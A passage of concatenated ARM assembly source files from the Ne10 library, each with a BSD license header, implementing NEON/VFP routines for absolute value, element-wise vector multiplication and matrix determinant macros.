@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_cross.asm.s
@
|
open-vela/external_Ne10 | 2,938 | modules/math/NE10_abs.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_abs.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_abs_float_asm
.thumb
.thumb_func
ne10_abs_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_float(arm_float_t * dst,
@ arm_float_t * src,
@ unsigned int count)
@
@ Computes dst[i] = fabs(src[i]) for i in [0, count).
@
@ r0: *dst
@ r1: *src
@ r2: int count
@
@ r2: loop counter
@
@ Only s1 plus the argument registers are used, so no stack frame or
@ callee-saved registers are needed. (The previous version zeroed s2
@ via r3, a leftover from an abs-by-subtraction implementation; s2
@ was never read, so that dead code has been removed.)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndFloat @ nothing to do when count == 0
.LoopBeginFloat:
vldr s1, [r1] @ Load s1 = src[i]
add r1, r1, #4 @ move to the next item
vabs.f32 s1, s1 @ s1 = abs(s1)
vstr s1, [r0] @ Store it back into the main memory; dst[i] = s1
add r0, r0, #4 @ move to the next entry
subs r2, r2, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 1,610 | modules/math/NE10_transmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_transmat.asm.s
@
|
open-vela/external_Ne10 | 14,846 | modules/math/NE10_mul.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mul.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_mul_float_neon
.thumb
.thumb_func
ne10_mul_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_float_t * dst,
@ arm_float_t * src1,
@ arm_float_t * src2,
@ unsigned int count)
@
@ Computes dst[i] = src1[i] * src2[i], four floats per NEON iteration,
@ with a scalar cleanup loop for the remaining count % 4 items.
@ The main loop is software-pipelined: the store of the previous
@ result overlaps the load/multiply of the next set.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@
@ NEON registers used: q0, q1, q3 only (d0-d3, d6-d7); the
@ callee-saved d8-d15 range is untouched. r4 is saved and restored.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cbz r3, .L_check_float
@ load the current set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the current set
vmul.f32 q3, q0, q1 @ q3 = q0 * q1
ble .L_mainloopend_float
.L_mainloop_float:
@ store the result for the current set
vst1.32 {d6,d7}, [r0]!
@ load the next set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vmul.f32 q3, q0, q1 @ q3 = q0 * q1
bgt .L_mainloop_float @ loop if r3 > 0, if we have at least another 4 floats
.L_mainloopend_float:
@ the last iteration for this call
@ store the result for the last one
vst1.32 {d6,d7}, [r0]!
.L_check_float:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_float
.L_secondloop_float:
@ process the last few items left in the input array
vld1.f32 d0[0], [r1]! @ Fill in d0[0]
vld1.f32 d1[0], [r2]! @ Fill in d1[0]
subs r4, r4, #1
@ multiply the whole d registers; only lane 0 is meaningful/stored
vmul.f32 d0, d0, d1
vst1.32 {d0[0]}, [r0]!
bgt .L_secondloop_float
.L_return_float:
@ return
pop {r4}
mov r0, #0 @ return 0 (success)
bx lr
.align 4
.global ne10_vmul_vec2f_neon
.thumb
.thumb_func
ne10_vmul_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_vec2f_t * dst,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ Computes dst[i] = src1[i] * src2[i] component-wise for 2D vectors,
@ four vectors per NEON iteration plus a cleanup loop.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@
@ ABI note: q4/q5 (d8-d11) are callee-saved under the AAPCS VFP
@ convention, so they are preserved with vpush/vpop below (the
@ previous version clobbered them without saving).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
vpush {d8-d11} @ preserve callee-saved NEON registers q4-q5
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cbz r3, .L_check_vec2
@ load the 1st set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vmul.f32 q4, q0, q2
vmul.f32 q5, q1, q3
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ store the result for the current set
vst2.32 {d8,d9,d10,d11}, [r0]!
@ load the next set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vmul.f32 q4, q0, q2
vmul.f32 q5, q1, q3
bgt .L_mainloop_vec2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_vec2:
@ the last iteration for this call
@ store the result for the last set
vst2.32 {d8,d9,d10,d11}, [r0]!
.L_check_vec2:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last few items left in the input array
vld1.f32 d0, [r1]! @ d0 = { V1.x, V1.y }
vld1.f32 d1, [r2]! @ d1 = { V2.x, V2.y }
subs r4, r4, #1
@ calculate values
vmul.f32 d0, d0, d1
vst1.32 {d0}, [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ return
vpop {d8-d11} @ restore callee-saved NEON registers
pop {r4}
mov r0, #0 @ return 0 (success)
bx lr
.align 4
.global ne10_vmul_vec3f_neon
.thumb
.thumb_func
ne10_vmul_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_vec3f_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ Computes dst[i] = src1[i] * src2[i] component-wise for 3D vectors,
@ four vectors per NEON iteration plus a cleanup loop.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@
@ ABI note: q4/q5 (d8-d11) are callee-saved under the AAPCS VFP
@ convention, so they are preserved with vpush/vpop below (the
@ previous version clobbered them without saving). q10-q12 (d20-d25)
@ are caller-saved and need no preservation.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
vpush {d8-d11} @ preserve callee-saved NEON registers q4-q5
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_vec3
@ load the 1st set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d6, d8, d10}, [r2]!
vld3.32 {d7, d9, d11}, [r2]!
subs r3, r3, #4
@ calculate values for the 1st set
vmul.f32 q10, q0, q3
vmul.f32 q11, q1, q4
vmul.f32 q12, q2, q5
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ store the result for the current set
vst3.32 {d20, d22, d24}, [r0]!
vst3.32 {d21, d23, d25}, [r0]!
@ load the next set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d6, d8, d10}, [r2]!
vld3.32 {d7, d9, d11}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vmul.f32 q10, q0, q3
vmul.f32 q11, q1, q4
vmul.f32 q12, q2, q5
bgt .L_mainloop_vec3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec3:
@ the last iteration for this call
@ store the result for the last set
vst3.32 {d20, d22, d24}, [r0]!
vst3.32 {d21, d23, d25}, [r0]!
.L_check_vec3:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last few items left in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ calculate values
vmul.f32 d0, d0, d1
vmul.f32 d2, d2, d3
vmul.f32 d4, d4, d5
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ return
vpop {d8-d11} @ restore callee-saved NEON registers
pop {r4}
mov r0, #0 @ return 0 (success)
bx lr
.align 4
.global ne10_vmul_vec4f_neon
.thumb
.thumb_func
ne10_vmul_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_vec4f_t * dst,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ Computes dst[i] = src1[i] * src2[i] component-wise for 4D vectors,
@ four vectors per NEON iteration plus a cleanup loop.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@
@ ABI note: q4-q7 (d8-d15) are callee-saved under the AAPCS VFP
@ convention, so they are preserved with vpush/vpop below (the
@ previous version clobbered all of them without saving). q10-q13
@ (d20-d27) are caller-saved and need no preservation.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
vpush {d8-d15} @ preserve callee-saved NEON registers q4-q7
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_vec4
@ load the 1st set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d8, d10, d12, d14}, [r2]!
vld4.32 {d9, d11, d13, d15}, [r2]!
subs r3, r3, #4
@ calculate values for the 1st set
vmul.f32 q10, q0, q4
vmul.f32 q11, q1, q5
vmul.f32 q12, q2, q6
vmul.f32 q13, q3, q7
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ store the result for current set
vst4.32 {d20, d22, d24, d26}, [r0]!
vst4.32 {d21, d23, d25, d27}, [r0]!
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d8, d10, d12, d14}, [r2]!
vld4.32 {d9, d11, d13, d15}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vmul.f32 q10, q0, q4
vmul.f32 q11, q1, q5
vmul.f32 q12, q2, q6
vmul.f32 q13, q3, q7
bgt .L_mainloop_vec4 @ loop if r3 > 0, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_vec4:
@ the last iteration for this call
@ store the result for the last set
vst4.32 {d20, d22, d24, d26}, [r0]!
vst4.32 {d21, d23, d25, d27}, [r0]!
.L_check_vec4:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last few items left in the input array
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ The values are loaded like so:
@ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
@ calculate values
vmul.f32 q0, q0, q1
vst1.32 {d0, d1}, [r0]!
bgt .L_secondloop_vec4
.L_return_vec4:
@ return
vpop {d8-d15} @ restore callee-saved NEON registers
pop {r4}
mov r0, #0 @ return 0 (success)
bx lr
|
open-vela/external_Ne10 | 9,403 | modules/math/NE10_detmat.neon.inc.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_detmat.neon.inc.s
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Get determinants of two 2x2 matrices in dRes.
@ Each "d" register holds the corresponding element of both matrices
@ (one per lane), so both determinants are computed in parallel:
@ dRes = dA*dD - dB*dC
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_DET_2x2MATS_ARGS dA, dB, dC, dD, dRes
vmul.f32 \dRes, \dA, \dD @ dRes = a*d
vmls.f32 \dRes, \dB, \dC @ dRes = a*d - b*c
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Get negated determinants of two 2x2 matrices in dRes.
@ Implemented by swapping the operand pairs in GET_DET_2x2MATS_ARGS:
@ dRes = dC*dB - dD*dA = -(dA*dD - dB*dC)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_NEG_DET_2x2MATS_ARGS dA, dB, dC, dD, dRes
GET_DET_2x2MATS_ARGS \dC, \dD, \dA, \dB, \dRes
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro used inside ne10_detmat_3x3f_neon() to load 3x3 matrices.
@ Two 3x3 matrices are loaded from the source address register \addr
@ (which is post-incremented past both matrices)
@ into registers dst00-11. The corresponding qr00-qr05
@ registers are then rearranged (via vtrn) so the order of the data
@ fits the code written in other macros below.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_3x3MATS_ARGS dst00, dst01, dst02, dst03, dst04, dst05, dst06, dst07, dst08, dst09, dst10, dst11, qr00, qr01, qr02, qr03, qr04, qr05, addr
vld3.32 { \dst00, \dst02, \dst04 }, [\addr]!
vld3.32 { \dst01[0], \dst03[0], \dst05[0] }, [\addr]!
vld3.32 { \dst06, \dst08, \dst10 }, [\addr]!
vld3.32 { \dst07[0], \dst09[0], \dst11[0] }, [\addr]!
vtrn.32 \qr00, \qr03
vtrn.32 \qr01, \qr04
vtrn.32 \qr02, \qr05
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the determinant of two 3x3 matrices
@ loaded using the above LOAD_3x3MATS_ARGS macro.
@ The result is stored in the \res register.
@ Registers \tmp2 and \tmp3 are used as scratch registers and will
@ not be restored in this macro - the caller needs to restore them
@ if needed. Each of the aa-ii parameters can be a "d" register
@ containing two floating-point values which correspond to the
@ following reference matrix:
@
@ |aa dd gg|
@ M = |bb ee hh|
@ |cc ff ii|
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_DETERMINANT_of_3x3MATS_ARGS aa, bb, cc, dd, ee, ff, gg, hh, ii, res, tmp2, tmp3
@ det = a*(ei-fh) - d*(bi-ch) + g*(bf-ec)  (cofactor expansion along the first row)
vmul.f32 \res, \ee, \ii @ t1 = ei
vmul.f32 \tmp2, \bb, \ii @ t2 = bi
vmul.f32 \tmp3, \bb, \ff @ t3 = bf
vmls.f32 \res, \ff, \hh @ t1 = ei-fh
vmls.f32 \tmp2, \cc, \hh @ t2 = bi-ch
vmls.f32 \tmp3, \ee, \cc @ t3 = bf-ec
vmul.f32 \res, \aa, \res @ t1 = a*(ei-fh)
vmls.f32 \res, \dd, \tmp2 @ t1 = a*(ei-fh) - d*(bi-ch)
vmla.f32 \res, \gg, \tmp3 @ t1 = a*(ei-fh) - d*(bi-ch) + g*(bf-ec) = det(M1), det(M2)
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the negated determinant of two 3x3 matrices.
@ The result is stored in \res.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_NEG_DET_3x3MATS_ARGS aa, bb, cc, dd, ee, ff, gg, hh, ii, res, tmp2, tmp3
@ det = - a*(ei-fh) + d*(bi-ch) - g*(bf-ec)
GET_DETERMINANT_of_3x3MATS_ARGS \dd, \ee, \ff, \aa, \bb, \cc, \gg, \hh, \ii, \res, \tmp2, \tmp3 @ Using the column exchange property (swapping two columns flips the sign)
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro used inside ne10_detmat_4x4f_neon() to load 4x4 matrices.
@ Two 4x4 matrices are loaded from the source address register \addr
@ (which is post-incremented past both matrices)
@ into registers dst00-15. The corresponding qr00-qr07
@ registers are then rearranged (via vtrn) so the order of the data
@ fits the code written in other macros below.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_4x4MATS_ARGS dst00, dst01, dst02, dst03, dst04, dst05, dst06, dst07, dst08, dst09, dst10, dst11, dst12, dst13, dst14, dst15, qr00, qr01, qr02, qr03, qr04, qr05, qr06, qr07, addr
vld4.32 { \dst00, \dst02, \dst04, \dst06 }, [\addr]!
vld4.32 { \dst01, \dst03, \dst05, \dst07 }, [\addr]!
vld4.32 { \dst08, \dst10, \dst12, \dst14 }, [\addr]!
vld4.32 { \dst09, \dst11, \dst13, \dst15 }, [\addr]!
vtrn.32 \qr00, \qr04
vtrn.32 \qr01, \qr05
vtrn.32 \qr02, \qr06
vtrn.32 \qr03, \qr07
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the determinant of 4x4 matrices
@ loaded using the above LOAD_4x4MATS_ARGS macro.
@ The result is stored in the \res register.
@ Registers \tmp2 to \tmp6 are used as scratch registers and will
@ not be restored in this macro - the caller needs to restore them
@ if needed. Each of the aa-pp parameters can be a "d" register
@ containing two floating-point values which correspond to the
@ following reference matrix:
@
@ |aa ee ii mm|
@ M = |bb ff jj nn|
@ |cc gg kk oo|
@ |dd hh ll pp|
@
@ det(M) = aa*det(SubM11) - ee*det(SubM12) + ii*det(SubM13)
@          - mm*det(SubM14), a cofactor expansion along the top row,
@ where SubM1x are the 3x3 minors built below.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_DETERMINANT_of_4x4MATS_ARGS aa, bb, cc, dd, ee, ff, gg, hh, ii, jj, kk, ll, mm, nn, oo, pp, res, tmp2, tmp3, tmp4, tmp5, tmp6
@ res = det(SubM11)
GET_DETERMINANT_of_3x3MATS_ARGS \ff, \gg, \hh, \jj, \kk, \ll, \nn, \oo, \pp, \res, \tmp5, \tmp6
@ tmp2 = det(SubM12)
GET_DETERMINANT_of_3x3MATS_ARGS \bb, \cc, \dd, \jj, \kk, \ll, \nn, \oo, \pp, \tmp2, \tmp5, \tmp6
@ tmp3 = det(SubM13)
GET_DETERMINANT_of_3x3MATS_ARGS \bb, \cc, \dd, \ff, \gg, \hh, \nn, \oo, \pp, \tmp3, \tmp5, \tmp6
@ tmp4 = det(SubM14)
GET_DETERMINANT_of_3x3MATS_ARGS \bb, \cc, \dd, \ff, \gg, \hh, \jj, \kk, \ll, \tmp4, \tmp5, \tmp6
vmul.f32 \res, \aa, \res @ res = aa*det(SubM11)
vmls.f32 \res, \ee, \tmp2 @ res -= ee*det(SubM12)
vmla.f32 \res, \ii, \tmp3 @ res += ii*det(SubM13)
vmls.f32 \res, \mm, \tmp4 @ res -= mm*det(SubM14)
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro used inside ne10_detmat_4x4f_neon() to load a single 4x4
@ matrix (16 floats) from the memory location pointed to by the \addr
@ register, post-incrementing \addr.
@ The loaded matrix is stored in registers dst00-07 and
@ finally rearranged using the corresponding registers qr00-qr03.
@ qtmp1-qtmp4 are scratch registers which are not restored in this
@ macro. The caller must restore them if needed.
@ NOTE: Throughout Ne10, matrices are loaded and stored in
@ column major format.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_SINGLE_4x4MAT_ARGS dst00, dst01, dst02, dst03, dst04, dst05, dst06, dst07, qr00, qr01, qr02, qr03, qtmp1, qtmp2, qtmp3, qtmp4, addr
vld4.32 { \dst00, \dst02, \dst04, \dst06 }, [\addr]!
vld4.32 { \dst01, \dst03, \dst05, \dst07 }, [\addr]!
@ Swap 32-bit lanes with the scratch registers so each qr register
@ holds its elements in the order expected by the consuming macros.
vtrn.32 \qr00, \qtmp1
vtrn.32 \qr01, \qtmp2
vtrn.32 \qr02, \qtmp3
vtrn.32 \qr03, \qtmp4
.endm
|
